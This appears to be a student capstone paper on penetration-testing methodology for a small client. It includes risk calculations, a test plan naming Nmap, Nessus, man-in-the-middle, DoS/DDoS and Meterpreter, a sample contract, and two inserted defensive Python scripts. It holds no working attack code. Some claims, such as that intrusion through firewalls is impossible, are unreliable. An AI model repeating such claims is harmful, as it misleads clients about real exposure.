Changing the approach in other phases can significantly change the outcome of the project. In any phase, giving no time to the details of the devices and services to test, to the test plan and agreement, or to the actual assessment can lead to missed targets. The assessment phase could rely on automation and not get the right results. It could concentrate too much on manual testing and miss the delivery date. The focus can change during the assessment based on real-time results, the tunnel vision of testers, and client intervention. Therefore, it is vitally important that the test plan is followed and communicated to the penetration test team in real time. This depends on the size of the client and the scope of the test. Any changes that do occur have to be evaluated by the lead on the project based on knowledge and experience. If the approach changes in phase six, where the report is delivered, there can be negative effects. If the report is delivered by email, there is a chance that it is intercepted. If the report provides little to no remediation tips and countermeasures, then the reason for the test is lost. How the report is generated can also be a factor in its effectiveness. If only automation is used and reported, that is failure. If some automation and some manual testing are used but the manual work is not included in the report, that is failure. There needs to be a time of learning in order to promote security. Defining how the attack was done is the reason for the hired service.

Approach Defense

It is evident from the preceding paragraphs that the approach must be well thought out and followed to be effective. This project has outlined the timeline and steps required to be effective. The approach represented by this project is very scalable, depending on the availability of resources. In each phase there is documentation of the meetings and objectives, so that the security posture is defined at the end of the project. Each phase requires that both sides understand their objectives and the mutually agreed-upon goal. As each phase comes and goes there is a check and balance, as the next phase is not possible until the previous phase is done. This check will be a call or email between the provider and the client as to when to proceed to the next step. This is especially true for phases four through six. Phases one through three can be done out of order, but the results of each naturally empower the next phase to begin. The justification for approaching the project in this manner is to educate the client and the penetration tester in best practices for penetration testing.

A post-process benefit of this project is that the company, private or public, stands to gain a significant advantage in reaching a security certification and accreditation by continuing its security audit in a chosen framework. Each phase from four to six will allow the client to benefit from the project. Assets and the processes associated with them are going to be defined for risk and impact. It would be wise for the company to quantify the assets and the associated risk if something were to happen. This work should be done after the first meeting, with an agreement to pursue it. This technical and business assessment aligns the technical process with business objectives, which falls under corporate governance.

Project Development

Hardware

The hardware used for the test will be the penetration tester's laptop and a server for the virtualized environment. The hardware at the test site, servers and network devices, is listed in Appendix A and is exercised as the test plan and time permit.


Software

No software will be developed for this testing. There may be some customized scripts, but no software development for testing at the client location. The penetration testing software that will be used is BackTrack, with several tools contained therein. The particular tools are listed in the test plan; a few of them are Ettercap, Metasploit, Nessus, and Nmap.

Tech Stack

The layers of service tested against are those of the OSI model, as well as some applications, again per the test plan in Appendix C. Most of the testing will target layers two through four and occasionally layer five.

Architecture Details

When the architecture is known, as for a white box test, the client provides the following information; it is summarized here, with details in Appendix A. The network is a flat network with one (1) server and ten (10) workstations. The penetration test used only one (1) workstation and one (1) server. There are VoIP phones, but they were not tested due to time constraints.

Resources Used

The test requires just one penetration tester and their laptop, due to the size of the client and the project timeline. The client's hardware is the test subject and is listed in Appendix A. No other resources are required.

Final Output

The output of this testing is a security posture assessment for the client, so that future action can be taken to remediate the vulnerabilities. The tangible result will be the report that follows the test plan. The test plan covers the objectives that need to be tested per the client's request. The results will include the objective, the exploit used, the report, and the steps to remediate the vulnerability. The intangible result will be the knowledge the client gains from having the test performed, as well as a roadmap to better security. In addition, the client will be able to start the task of becoming compliant with an industry security standard: either ISO 27001/2 for private companies, or FISMA compliance by following the NIST SP 800-53 Revision 3 publication for the public sector.

The initial meeting with the client showed just how susceptible the equipment and applications on site are. Once the client realized the potential for loss, they were convinced the penetration testing service was needed. The subsequent meeting was an interview that detailed the business process flow, starting from the profit-making activities. These activities are seen in Appendix B, Critical Services, and Appendix D, Audited Processes. The inventory was also taken and recorded, noting that an outsourced IT company was taking care of the run-and-maintain aspects. After the meeting, the penetration testing team went back to the office to outline a test plan and the contract agreement noted in Appendix G. The client did not have a technical lawyer to understand the effects the test would have, but was knowledgeable enough to know the impact if business processes were damaged beyond resumption. Most important is that the data and services the business requires stay functional even after the test. Notably, any client information or financial data of the client's customers must also remain confidential and retain its integrity. The laws requiring that client information remain private are extensive. None of the more popular federal laws applies to this private client; however, the law is the same. The penetration team then submitted the test plan and the contract agreement to the client for written permission to test their network.


Quality Assurance

Quality Assurance Approach

The quality management approach for this test is to communicate and plan, and then check often at each phase whether the project is staying on course with its design. If at any step the communication and understanding of what needs to be done or explained starts moving off target, then the lead penetration tester will assert themselves to regain control and proceed as planned. The accountability between the two parties will remain in effect as part of the deliverables from the test plan. Both parties will sign the test plan after it has been reviewed by legal counsel. The terms and conditions will be set to protect each party while driving the process forward.

Solution Testing

The solution chosen for this project is explicitly described in ISO 27001/2, in which assets, processes, and associated impacts must be defined. This practice has been emulated here in the penetration test process and provides a methodology for the client to move forward. The methodology is the plan, do, check, act process explained in the ISO 27001/2 standard as well as in the Risk Management Framework, but with different steps.

Most ineffective penetration testing is the result of poor planning and poor communication of the client's needs and of the solutions from the penetration testing team. There is research supporting that security testing does not always go as purchased, meaning that what you bought is not what you are getting. Some of that research has been provided herein. This solution is to be tested by a real penetration test, documented here.


Implementation Plan

Strategy for the Implementation

The strategy for this project is plan, do, check, act in its simplest form. What we have seen from other strategies is to throw resources at the problem and produce some manufactured report that really does not explain why exploits occur and how they affect the client's business processes. The following description of the rollout phases describes in detail how the project is to run.

Is the test just for insecure configurations and port usage, or for patch level? Is the testing going to be conducted in isolation, or as the devices are used together with other technology that provides a service? Will application source code be accessible for vulnerability review? Can scripts be made to validate it? Questions like these need to be asked in order to define the scope of the test. Therefore, the asset owners are to make a list of the devices providing services that, if not protected, could prevent the company from making a profit. This will be done in preparation for the execution phase.

Phases of the Rollout

The test will be rolled out in the following sequence. First, there has to be a meeting between the penetration test group and the potential client. It is here that the client will understand the explanation of terms and services and which of those they will accept in an agreement. Between the presentation of services and the signing of the agreement, the company needs to seek legal counsel. The company needs to get legal advice from an attorney who has knowledge of technological testing, where intellectual property, assets, and risks operate in the same arena. The lawyer has to be knowledgeable about 18 USC Sections 1029 and 1030, PCI, Sarbanes-Oxley, and other laws about privacy and disclosure. The company will coordinate with the lawyer to make sure that the vendor they choose operates under an agreement.

The next step is to make sure that the client has instructions to prepare documentation for what is to be tested. In order to conduct a penetration test correctly, the client will have to define their assets and organize them: know what is in their possession and know what needs to be tested. This could mean assigning ownership of each asset analyzed. There are a few tools to help with the risk assessment. The client is to pick a tool or two: one that measures risks on software such as operating systems and one that does networks. One tool is referenced in Appendix B. This needs to be completed before the penetration team does their testing. It is entirely up to the client, before any testing of the infrastructure, to put in place a communication tree between the CIO and the outsourced vendor. This way, if something does affect the production network, someone can stop it or inform the staff that this is expected today.

The next thing the client needs to do is calculate the risk. Most often it is the quantitative assessment, then the qualitative. However, here are the two assessments, presented by the two formulas: Calculate Risk = Vulnerability X Attacks X Threat X Exposure (Snedaker, 2007). This will definitely yield a dollar amount, but there is some subjective evaluation of the attack and exposure factors. Again, this qualitative weight in the quantitative formula makes it a hybrid. Unless the client is benchmarking from proven studies to extrapolate the numbers, there will be some subjective input. The latter formula could be qualitative, as the reference to the frequency will be subjective in the first-year run. Subsequent years can more easily define risk quantitatively, as a historic record will assist in the following years.

Finally, when the penetration team arrives on site, or at a location for the coordinated effort, the first thing will be for the leader to go over the test plan. Each penetration tester has their own skill level and strengths and will be charged with the activity that is their strong suit. This will complete phase one of the assessment. In phase five of the project the penetration testers will be actively engaging their targets while keeping the lead informed of successes, failures, or peculiar findings along the way. These real-time results will be recorded, and resources may be allocated to different focuses as time and the test warrant.

Phase six will end the agreement: the test results and countermeasures will be supplied in a hand-delivered report. This helps ensure that no information about the client's test results gets out.

Details of the Go-Live

The project will be fully implemented when the penetration test is completed and the results delivered. If a company cannot be found for a real test, one will be used for a theoretical penetration test.

Dependencies

Dependencies are the items that must be completed before proceeding to the next phase. This project outlines at least three phases that should be completed before the penetration test begins in phase four. The documentation is very important and must be completed, or the entire results of the project are in jeopardy. The documentation created and the processes driving this project will help make the penetration test more effective.

Deliverables

The deliverables are going to be both tangible and intangible because of the technology used. The first realization of achievement will be the report following the penetration test: first, as in, the first item derived from the process exclusively for the sake of gain. There is no higher achievement. Notably, the process itself will yield both tangible and intangible deliverables: the process to list and quantify assets and their associated risks is an intangible foundation for other security standards, and the asset sheet and the numerical values assessed in determining the risks are tangible. These three deliverables are the essential part of this project. The effective penetration test is the deliverable that both the client and the penetration team benefit from. Both parties can walk away knowing that they had set out and done exactly what they were going to do.

Training Plan for Users

This project does not provide any training; however, in order to achieve success, the terminology that will be taught to the client will be considered training.

Risk Assessment

Quantitative and Qualitative Risks

Costs are the number one driving factor around security if you look at it from the results. Costs will be incurred if no security measures are taken. In addition, costs are required to assure a certain level of security. Finally, costs are the numerical value debated between departments when determining where to spend money. With this mindset, the quantitative and qualitative risks are going to be defined.

Qualitative risks associated with security were referenced in the preceding paragraph, and that sets the scene for the discussion here and, in the next paragraph, for quantitative risks. How well do you know your network infrastructure? This question is the subject of the project and is evaluated in terms relative to the risk of missing business opportunities. The risk associated with not defending the network perimeter can be devastating. First, the client may no longer have confidential and available resources. The downstream network devices may not be able to provide services as they used to if software is being hacked or some malware has inserted itself onto the network. There is a numerical value associated with this, but for this case we are looking at the client's inability to remain productive and to generate profit for the shareholders or stakeholders in the wellness of the organization. What are the items at stake? They are jobs, income, reputation, and liability, to name a few. This impact on operations from not having a penetration test is evidenced by the likelihood, or frequency, that an event will take place. This can be matched up to costs and become quantitative later. Most times this is represented in a chart with X and Y axes: frequency along the X axis, impact along the Y axis, and the events as the row on top along the X axis. The project is to safeguard against the possibility that the event will take place.
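As an added illustration, not part of the capstone, the following Python script combines the two views the paper describes: the Snedaker product formula from the risk calculation step, with qualitative ratings mapped onto numeric weights (the hybrid the paper notes), and the frequency-by-impact chart, laid out like the 3x3 matrix in Appendix E. The service names come from Appendix B; the factor ratings, the 1-4 weight scale, and the dollar figures are constructed for this example and are not the client's numbers.

```python
from dataclasses import dataclass

# Qualitative ratings mapped to numeric weights. The 1-4 scale is an
# assumption for this example; the paper does not fix one.
RATING = {"low": 1, "medium": 2, "high": 3, "critical": 4}

# Frequency (X axis, columns) by impact (Y axis, rows) matrix, laid out
# like the 3x3 matrix in Appendix E: the top row is the highest impact.
LEVELS = ["low", "medium", "high"]
MATRIX = {
    "high":   ["medium", "high",   "critical"],
    "medium": ["low",    "medium", "high"],
    "low":    ["low",    "low",    "medium"],
}


@dataclass
class Asset:
    """One row of a risk register; the four factors are the paper's formula inputs."""
    name: str
    vulnerability: str
    attacks: str
    threat: str
    exposure: str
    frequency: str        # how often a loss event is expected (qualitative)
    impact: str           # business impact if it happens (qualitative)
    daily_sales: float    # dollars of sales per day the service supports (constructed)


def _weight(label: str) -> int:
    try:
        return RATING[label.lower()]
    except KeyError:
        raise ValueError(f"unknown rating {label!r}; use one of {list(RATING)}")


def risk_score(a: Asset) -> int:
    """Calculate Risk = Vulnerability x Attacks x Threat x Exposure (Snedaker, 2007),
    with each qualitative factor replaced by its weight: the hybrid the paper describes."""
    return _weight(a.vulnerability) * _weight(a.attacks) * _weight(a.threat) * _weight(a.exposure)


def matrix_rating(frequency: str, impact: str) -> str:
    """Read the qualitative rating off the frequency x impact chart."""
    if frequency not in LEVELS or impact not in LEVELS:
        raise ValueError("frequency and impact must be one of low/medium/high")
    return MATRIX[impact][LEVELS.index(frequency)]


def outage_cost(a: Asset, days_down: float) -> float:
    """Quantitative view the paper gives for a downed service: lost daily sales."""
    return round(a.daily_sales * days_down, 2)


def risk_register(assets, days_down: float = 1.0):
    """Rank assets by product score, attaching the matrix rating and outage cost."""
    rows = [
        {
            "name": a.name,
            "score": risk_score(a),
            "rating": matrix_rating(a.frequency, a.impact),
            "outage_cost": outage_cost(a, days_down),
        }
        for a in assets
    ]
    # Highest score first; ties are broken by outage cost so the costlier asset leads.
    rows.sort(key=lambda r: (r["score"], r["outage_cost"]), reverse=True)
    return rows


# Constructed sample register: service names from Appendix B, everything else invented.
SAMPLE_ASSETS = [
    Asset("Project Entry (Streetsmarts)", "high", "medium", "high", "medium", "medium", "high", 12000.0),
    Asset("Invoices Printed and Sent", "low", "low", "medium", "low", "low", "low", 3000.0),
    Asset("Windows IIS Service", "medium", "high", "medium", "high", "high", "medium", 5000.0),
]

if __name__ == "__main__":
    for row in risk_register(SAMPLE_ASSETS, days_down=2):
        print(f"{row['name']:<30} score={row['score']:>3} matrix={row['rating']:<8} "
              f"2-day outage=${row['outage_cost']:,.2f}")
```

Run stand-alone it prints the ranked register. The point to notice is that two of the sample services score identically on the product formula and only separate once the quantitative outage cost is applied; that is the first-year subjectivity the paper warns about, and a historic record of actual event frequencies is what replaces the guessed weights in later years.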

Quantitatively speaking, the cost can be found by applying a cost to certain events or assets and their frequency. This part of the project may or may not be completed by the client, but it should be in order to progress down the road to a security standard certification. The first cost to review is reputation. This cost is priceless and should be protected at any cost required. When you have lost your reputation from a breach there is no recovery, depending on the type of breach and trade. There may be other costs of not doing the penetration test for a hosted web application tied to an internal database. Here, if a hacker could find a way in through SQL injection or a stack overflow, some information or access might be given that helps the hacker get in. Quantitatively, the cost of a downed website is proportionate to the amount of sales generated on any given day, if nothing further is done from the event.

Cost/Benefit Analysis

Below are a few cost/benefit analyses if certain criteria exist without action.

• If no penetration test occurs, then the cost of an intrusion and leaked data can be exceedingly high. A lost laptop has been reported to cost $89,000.00; imagine what would happen in a break-in that could total millions of dollars. "As reported from Symantec that every corporate breach cost 5.5 million" (Symantec, 2011). Most of these breaches are Trojans, worms, and viruses, and not what the public thinks of as intrusion into the network by hackers at the front door. Most networks have very good firewalls, so intrusion through firewalls is not possible.

• If the penetration test proceeds without proper tracking and yields results that were not requested or are incorrect, then the cost can be high, including the cost of the penetration test. Some exploits are going to get past the penetration testers and the company looking for a very good assessment. No penetration test can find everything in the time given, but it does give a snapshot in time of how the security posture stands in a few key areas. There will be no cost overrun, as this activity is budgeted and, if effective, should provide a return on investment.

Notably, the client chosen for this is in the petroleum refining industry, and when the Symantec-sponsored risk calculator was used to assess the client's risk, the results were fitting. According to the risk calculator, this client stood to lose approximately $98,000.00 for each data breach event. Considering the client is not very large and does not have a large attack surface, this result is suitable, as shown in Appendix I.

Risk Mitigation

The process of identifying risk is important in order to protect the business from adverse effects on a device, business process, or objective. Risk is defined by the opportunity that exists for something to go wrong based on design, configuration, or use. Risk is the overall scope of devices, processes, threats, and the frequency or likelihood that a negative event will occur. The risks that the client identifies will be the ones tested. Effectively mitigating these risks must begin with identification, and then the risks must be solved. The best way to mitigate a risk is to find the vulnerability, patch it, and prepare a plan around it. The cost to avoid, defer, or prevent the risk will be the secondary driving force in the risk mitigation selection; the primary driver will be the business process benefit. If avoidance is chosen, then some aspect of the business is omitted. This can mean a loss of income in order to avoid some risk. The client would have to ask itself whether removing a line of business is worth not facing the risk. If a business process that has such a high impact is not removed, then the associated high costs to mitigate the threat will be incurred.

If the risk associated with the client's core business application, such as a zero-day or other vulnerability occurring, is high, then the action is preventative. Preventative action could be to have a custodian of that application present to patch and monitor the application and the data it produces. There could be a secondary server that is kept offline and patched, ready to go. The secondary can contain relevant data in the event that the primary is compromised or destroyed. This backup plan is a very good solution, like a hot site for disaster recovery.

The alternative to having a backup server ready to launch should the primary go down would be to outsource it to the cloud. The risk is still there, but now you have transferred that risk to a cloud provider who will manage it for you. The cloud provider still faces the same risks the client would have; the question is the cost of the cloud solution for use and maintenance versus having the server in house.

Post Implementation Support and Issues

Post Implementation Support

When the penetration test is over and the results and remediation steps have been presented, the only thing left to do is to periodically test the same systems. This is part of a continuous improvement plan and validation of countermeasures. All security standards repeat the same steps in order to review essential and non-essential systems and security practices. This will be the post-implementation support. The client can elect to have the same penetration test team review their assets so as not to have to create new relationships with other groups. This consistency will help the client's security posture remain poised and ready to adapt to new systems and environments.

The client will have an annual review of assets and processes, and the following penetration test will record the effectiveness of the implemented countermeasures. When the second penetration test is completed, the results and countermeasures from the first test will be reviewed against the second test. The time taken to review the results between tests will help the penetration test team gauge how well the client's IT department is able to perform the necessary changes. Any high-risk results will be brought before the executive office for review. Again, a report and countermeasures will be provided to the client.

The forms required will be the same as those listed in the appendix, as will the report. This annual review by penetration test will start to present a theme for security, either good or bad. There are no other forms required externally, but internally there may be guidelines and procedures created as a product of the first test.

Post Implementation Support Resources

Providing for the future security of the client is going to be a concern both for security and for revenue generation for the pen testing company. Most important is that the client receives some support going forward. This effort will first be evidenced in the report that follows the test. The countermeasures and best practices to safeguard and mitigate risks will outline some maintenance-type activities. The following guideline describes what should be done, when, and by whom.


Maintenance Plan

The short period after the penetration test will be the most active, as the client receives instructions from the pen testers to harden network devices, servers, and endpoint devices. This lockdown session will be executed according to the results from the penetration test first and then by industry best practices. The patching of the core business application will lead the changes, followed by the hardening of network and endpoint devices. This will conclude the short-term plan.

The long-term plan will have the following built into a series of rollouts as budget and time permit. The department will have security-hardened workstations where only the services necessary to do the job will be running. The workstations will have integrity checks performed every hour on the MD5 hash values of files that are used by processes. If a process is initiated by something other than the system account or from a non-sanctioned program, an alert will go out. The process will be stopped and blocked from making changes to the system. This will be an example of TCSEC (Trusted Computer System Evaluation Criteria) verified protection. All networks will be designed securely with IDS and IPS systems in an enterprise-style monitoring and control system. Packets will be captured and analyzed by deep packet and application-layer inspection. This intense scanning allows for the recording of network traffic for forensic analysis. Users' email will be filtered based on rules stating that email will only be received from known users and will be subject to inspection and analysis of content. Here the email is read and executed on VMware-hosted systems that act as end users. These test VMware machines open email like normal users and record what files and processes are initialized and modified. When the results show no detrimental impact on the system, the email is then sent to the end user and the IT department. If there are adverse effects on the VMware system, then the system records the email, processes, files, and changed state of the computer. This will allow for a lower cost of maintaining the systems over time, as these threats will be mitigated in VMware. In addition, the Security department will learn what tools and methods are used to exploit users and systems for information.
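Added example, not from the capstone or the client's environment: a small Python file-integrity checker implementing the hourly hash check the long-term plan calls for. It baselines a directory, then reports modified, missing, and added files on each run, and includes an allowlist check for the "sanctioned program" rule (the executable's digest must match one recorded when it was approved). The demo() function builds a scratch tree with constructed file names and tampers with it to show the drift report. The plan names MD5, so the demo uses it; the algorithm is a parameter, and SHA-256 is the better choice today because MD5 collisions are cheap to produce, although for catching unintended change MD5 still works. Keep the saved baseline outside the monitored tree, on read-only media or a separate host, since an intruder who can alter the watched files could otherwise rewrite the baseline as well.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path

CHUNK = 65536


def file_digest(path, algorithm="md5"):
    """Hash one file in chunks so large binaries never sit wholly in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, algorithm="md5"):
    """Map every regular file under root (as a relative POSIX path) to its digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): file_digest(p, algorithm)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def save_baseline(baseline, dest):
    """Persist the baseline as JSON; dest should live outside the monitored tree."""
    Path(dest).write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(src):
    return json.loads(Path(src).read_text())


def verify(root, baseline, algorithm="md5"):
    """Re-hash the tree and report drift relative to the stored baseline."""
    current = build_baseline(root, algorithm)
    return {
        "modified": sorted(f for f in baseline if f in current and current[f] != baseline[f]),
        "missing": sorted(f for f in baseline if f not in current),
        "added": sorted(f for f in current if f not in baseline),
    }


def drift_detected(report):
    """True when any category in a verify() report is non-empty."""
    return any(report.values())


def is_sanctioned(exe_path, allowlist, algorithm="md5"):
    """Allowlist check: the executable's digest must be one recorded at approval time."""
    return file_digest(exe_path, algorithm) in allowlist


def demo():
    """Constructed run: baseline a scratch tree, tamper with it, re-verify.
    Returns (clean_report, drift_report, exe_still_sanctioned)."""
    root = Path(tempfile.mkdtemp(prefix="fim_"))
    try:
        (root / "bin").mkdir()
        exe = root / "bin" / "app.exe"          # stand-in for the core application binary
        exe.write_bytes(b"original binary")
        (root / "config.ini").write_text("db=server01\n")   # constructed content
        (root / "README.txt").write_text("ok\n")

        baseline = build_baseline(root)
        allowlist = {baseline["bin/app.exe"]}
        clean = verify(root, baseline)          # nothing has changed yet

        exe.write_bytes(b"altered binary")      # simulated unsanctioned change
        (root / "README.txt").unlink()
        (root / "unexpected.txt").write_text("new file\n")

        drift = verify(root, baseline)
        return clean, drift, is_sanctioned(exe, allowlist)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    before, after, exe_ok = demo()
    print("clean run drift:", drift_detected(before))
    print("after tampering:", json.dumps(after, indent=2))
    print("app.exe still sanctioned:", exe_ok)
```

In practice build_baseline() runs once on a known-good system, save_baseline() writes the result somewhere the monitored host cannot modify, and a scheduled task (hourly, as the plan states) calls verify() and raises the alert when drift_detected() is true.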

Users requiring access to files on the network will have a second machine, not attached to the internet, where they will access this information. Keeping the two systems separate adds a physical layer of protection where the more sensitive information has no means of going outside. This will address any further vulnerability found in the core business application. Not only will these machines not have internet access, but they will also not have USB ports, CD/DVD-RW drives, or any other means to install or remove data. Thin clients will be used with Citrix XenApp and XenDesktop to deploy virtual desktops. These virtual desktops are maintained locally on a server, where security-hardened processes are used to verify integrity before use each day.

Conclusion, Outcomes, and Reflection

Project Summary

This project started out with the realization that not all penetration tests are done correctly. Many tools and easy-to-use frameworks exist to help aid in testing, but they should not be relied on to lead the test. Certain criteria that the client requests to be validated often go unmet, and therefore incorrect results are circulated. The project set out to determine how to achieve an effective penetration test. What was presented were statistics showing that many are run incorrectly, with poor communication and design of the test plan. The field survey showed a real-time efficiency grade done by companies that perform these tests. It all indicates that more is needed to improve the service while educating the client. Next, the project covered the phases of what was to be done and their details. The product of the design and testing was an effective penetration test showing that the core application and server are resilient to the most common attacks.

Deliverables

The deliverable that the project is primarily responsible for is the results from the penetration test and the countermeasures. All other documentation created is to facilitate the process and will benefit the client. There may be diagrams submitted within the report to expand upon a result, but most will be text output.

Outcomes

The resultant effects of this project have been highly esteemed by industry professionals and the client receiving the service. Penetration testing is certainly a very intense and time-consuming process when there is a commitment to the act. The energy, intellect, and business relationships that have been developed over the course of the project have heightened the sense of the need for security. What was anticipated in the process was delivered on all counts except for the actual test. A theoretical test based on a real company was conducted in its place. The results of the DoS and DDoS attacks were not expected. It did inform the candidate that not all goes as planned on either side of the test.

The client was very happy to receive the results of the penetration test showing how resilient their application stood against several attacks. The manufacturer of the core business application was also very happy to hear that the results were good and that their product is resilient. The candidate expresses satisfaction that the effort expended builds towards their profession and that the experience will help sharpen their skills for the next opportunity.


Reflection

The candidate has learned a great deal about the process of knowing how to legally break into and stop a service in order to provide a security assessment for a client. The steps taken in the project were required in order to be effective, with checking after each phase and planning of the next. The time taken to meet with a client and provide a real understanding of just how attackers work to take down businesses was rewarding. The client really appreciates the time taken to empower and defend their business against today's malicious technological minds.


References

Pivot Point Security. (2012). Stop Wasting Your Money on Penetration Testing. Retrieved from http://pivotpointsecurity.com/downloads/18

McKerchar, R. (2012). Practical IT: how to manage cost-effective penetration testing. Retrieved from http://nakedsecurity.sophos.com/2012/05/09/practical-it-how-to-manage-cost-effective-penetration-testing/

Imperva. (2012). Hacker Intelligence Initiative, Monthly Trend Report #13. Retrieved from http://www.imperva.com/docs/HII_Monitoring_Hacker_Forums_2012.pdf

Verizon. (2012). 2012 Data Breach Investigations Report. Retrieved from http://www.verizonbusiness.com/resources/reports/rp_data-breach-investigations-report-2012_en_xg.pdf

Netragard. (2012). How to Choose the Right Vendor. Retrieved from http://www.netragard.com/how-to-avoid-failure-with-your-next-penetration-testvulnerability-assessment?utm_expid=26785886-2&utm_referrer=http%3A%2F%2Fwww.netragard.com%2F

Snedaker. (2007). The Best Damn IT Security Management Book Period. Retrieved from http://mmlviewer.books24x7.com/book/id_25442/viewer.asp?bookid=25442&chunkid=761233067

Symantec. (2012). 2011 Annual Study - U.S. Cost of a Data Breach. Retrieved from http://www.slideshare.net/symantec/2011-annual-study-us-cost-of-a-data-breach-march-2012


Appendix A: Network Devices

| Electronic Equipment      | Owner(s)       | Quantity | Tested |
|---------------------------|----------------|----------|--------|
| 3com 5500 24p Switch      | Out Sourced IT | 1        | No     |
| Dell R710 Windows 2008 R2 | Out Sourced IT | 1        | Yes    |
| Dell Workstations         | Out Sourced IT | 10       | Yes    |
| Cisco Phone               | Out Sourced IT | 10       | No     |
| Printers                  | Out Sourced IT | 1        | No     |


Appendix B: Critical Services

Company services associated with devices that are critical for daily operation are mapped and listed below.

| Name of Service | Severity | Associated Device(s) | Up/Down Stream Process | Process Owner |
|-----------------|----------|----------------------|------------------------|---------------|
| Project Bidding | Medium | Windows Server 2008 R2/Workstations/LAN/Phones | Projects entered into Streetsmarts | Operations Manager |
| Project Entry | High | Windows Server 2008 R2/Workstations/LAN | Projects entered into Streetsmarts/Streetsmarts auto calculation | Operations Manager |
| Ticket Info Entered | High | Windows Server 2008 R2/Workstations/LAN | Streetsmarts auto calculation/Ticket Batch Upload | Scale Clerk |
| Ticket Batch Upload | High | Windows Server 2008 R2/Workstations/LAN | Streetsmarts auto calculation/Costs accounted in Streetsmarts, invoice goes out | Scale Clerk |
| Invoices Printed and Sent | Low | Windows Server 2008 R2/Workstations/LAN/Printer | Receives all payments/Enter payments | Accounts Receivable |
| A/R Enter payments | Medium | Windows Server 2008 R2/Workstations/LAN/Phone | Payments post to all accounts/Issue payments to vendors | Accounts Receivable |
| A/P Enter payments | High | Windows Server 2008 R2/Workstations/LAN/Phone | Prints checks and sends them/Payments post to all accounts and balances | Accounts Payable |
| Payments post to all accounts and balances | Medium | Windows Server 2008 R2/Workstations/LAN | Issues payments to vendors and employees/Enters payments | Accounts Payable |
| Prints checks and sends them | Low | Windows Server 2008 R2/Workstations/LAN/Printer | Enters payments/Prints checks and sends them | Accounts Payable |
| Payments post to all accounts and balances | Medium | Windows Server 2008 R2/Workstations/LAN | Prints checks and sends them | Accounts Payable |
| Windows IIS Service | Low | Windows Server 2008 R2/Workstations/LAN | Streetsmarts/Time Tracker | Outsourced IT |


Appendix C: Penetration Test Plan

This is the penetration test plan that was designed after receiving the list of critical devices and associated services. This test plan will be followed and not deviated from in the initial test. The client can request in writing, at any time after the initial test, that further testing be performed per test result for further analysis. The following is the list of items for the test plan.

1. Target Devices and Services
   a. Have all identified targets of evaluation documented
   b. Obtain and review prioritized list of services
2. Scan Operating Systems
   a. Use Microsoft Baseline Security Analyzer
   b. Use Nmap to discover devices and banner grabbing
   c. Use Nessus to discover vulnerabilities
3. Test Network Devices
   a. Use Nmap to discover devices and ports
   b. Discover services
   c. DoS/DDoS Attack
4. Test Core Business Application
   a. Test core business application against
      i. Clear text traffic capturing
      ii. Man in the middle
      iii. Spoofing
      iv. Armitage w/Meterpreter


Appendix C: Penetration Test Action Plan (Con’t)


Appendix D: Audited IT Processes

This section contains information about the processes that run along with IT assets in the penetration test.



Appendix E: Qualitative Risk Matrix

| Event 1 | Event 2 | Event 3  |
|---------|---------|----------|
| Medium  | High    | Critical |
| Low     | Medium  | High     |
| Low     | Low     | Medium   |

Appendix F: List of Legal Concerns

1. Customer data privacy
2. Transaction integrity (Non PCI Transactions)
3. Theft of client data
4. Corporate Espionage
5. Employee Data privacy
6. Tax and Accounting Record Keeping

Since this company is not publicly traded, the following information should be considered when reviewing risk and requirements for testing as time permits.


Appendix G: Sample Contract

PENETRATION TESTING CONTRACT

This contract is between Pen-test team (hereinafter referred to as the "provider") and target client (hereinafter referred to as the "client") for the supply of Penetration Testing services by the provider for the client.

Whereas the provider provides certain computer and systems security consulting and testing services, including Penetration Testing services, and whereas the client wishes to retain the provider to provide computer and systems security services, specifically Penetration Testing services, therefore the client does hereby retain the provider for the purpose of providing Penetration Testing services on the client's computers and network infrastructure.

The objective of the Penetration Testing service is to identify and report on the security posture, including any vulnerability, to allow the client to close the issues in a planned manner outlined by the provider, thus significantly raising the level of their security protection. The client understands that computer security is a continually growing and evolving environment and that testing by Pen-test team does not mean that the client's site is secure from every form of attack. There is no such thing as 100% effective testing; for example, it is never possible to test for vulnerabilities in software or systems that are not known at the time of testing. Further, security breaches can and frequently do occur from internal sources whose access is not a function of system configuration and/or external access security issues.

The client has provided the provider with certain required information regarding the scope and range of the tests from the inventory audit and business process assessment, and the client hereby warrants that all information provided is true and accurate and that the client owns or is authorized to represent the owners of the computers and systems described. The client further warrants and represents that they are authorized to enter into binding legal agreements.

The provider has provided a written quote for the services contracted in the amount of $1,600.00. The client, prior to any services being performed by the provider, shall make half payment for the contracted services one week prior to the start date. A copy of the written quote is attached to this contract as Schedule A. The provider will complete the penetration test on the agreed-upon start date of 15-Jan-2013 and finish date of 18-Jan-2013. Upon furnishing the written report and the remediation effort required to harden the client's systems, all remaining payments or balance shall be paid in full. Any payment that exceeds 30 days past the report delivery date shall accrue interest of five percent (5%) compounded each business day.

The provider shall be under no liability whatever to the buyer for any indirect loss and/or expense (including loss of profit) suffered by the buyer arising out of a breach by the provider of this contract. In the event of any breach of this contract by the provider, the remedies of the buyer shall be limited to a maximum of the fees paid by the client.

There will be a communication plan between the pen test team and the operations manager of the client. At each point in the test there will be notification of that test beginning to the operations manager only. If there are any adverse effects of the test, the Operations Manager will notify the lead pen tester. The test will stop and results will be noted.


Both parties shall maintain this contract as confidential. No information about this contract, contract terms, or contract fees shall be released by either party. Information about the client's business or computer systems or security situation that the provider obtains during the course of its work will not be released to any third party without prior written approval.

The provider and the client have imparted and may from time to time impart to each other certain confidential information relating to each other's business, including specific documentation. Each party agrees that it shall use such confidential information solely for the purposes of the service and that it shall not disclose such information, directly or indirectly, to any third party, either expressed or otherwise. Where disclosure to a third party by either party is essential, such party, with the agreement of the other party, will prior to any such disclosure obtain from any such third party duly binding agreements to maintain in confidence the information to be disclosed, to the same extent at least as the parties are bound.

This contract is subject to the laws of the State of Connecticut, USA. All disputes arising out of this contract shall be subject to the exclusive jurisdiction of the State of Connecticut, USA.

Neither party shall be liable for any default due to any act of God, war, strike, lockout, industrial action, fire, flood, drought, storm or other event beyond the reasonable control of either party.

Schedule A

The following is an estimate for the test plan. It will take one work day, or eight (8) hours, to complete the following work.

Time          Task
08:00-08:30   Target Devices and Services
